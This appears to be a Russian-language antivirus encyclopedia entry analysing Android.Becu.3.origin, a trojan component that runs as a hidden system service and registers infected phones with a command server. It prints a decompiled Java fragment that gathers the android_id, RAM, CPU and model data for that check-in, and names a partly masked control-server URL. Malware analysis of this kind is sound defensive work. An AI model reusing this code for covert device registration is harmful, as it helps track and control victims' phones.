Детектирование для одного из компонентов троянца Android.Becu.1.origin. Android.Becu.3.origin не создает ярлыка на главном экране операционной системы, функционирует в качестве системного сервиса и имеет имя программного пакета com.zgs.ga.pack. Загружается вредоносным приложением Android.Becu.1.origin с удаленного центра управления, после чего запускается на исполнение.
Android.Becu.3.origin при помощи json-запроса регистрирует зараженное мобильное устройство на управляющем сервере по адресу http://[xxxxxxxx]qs.mobi/houtai/clientregister.php?token=:
JSONObject v3 = new JSONObject();
try {
v3.put("project_id", this.b());
v3.put("unique_id", Settings$Secure.getString(((Context)this).getContentResolver(),
"android_id"));
JSONObject v4_1 = new JSONObject();
v4_1.put("ram", c.a());
v4_1.put("cpucores", c.b());
v4_1.put("build", Build.MODEL);
v4_1.put("sdk", Build$VERSION.SDK_INT);
v3.put("info", v4_1);
В результате злоумышленники получают сведения об активных копиях троянца Android.Becu.1.origin.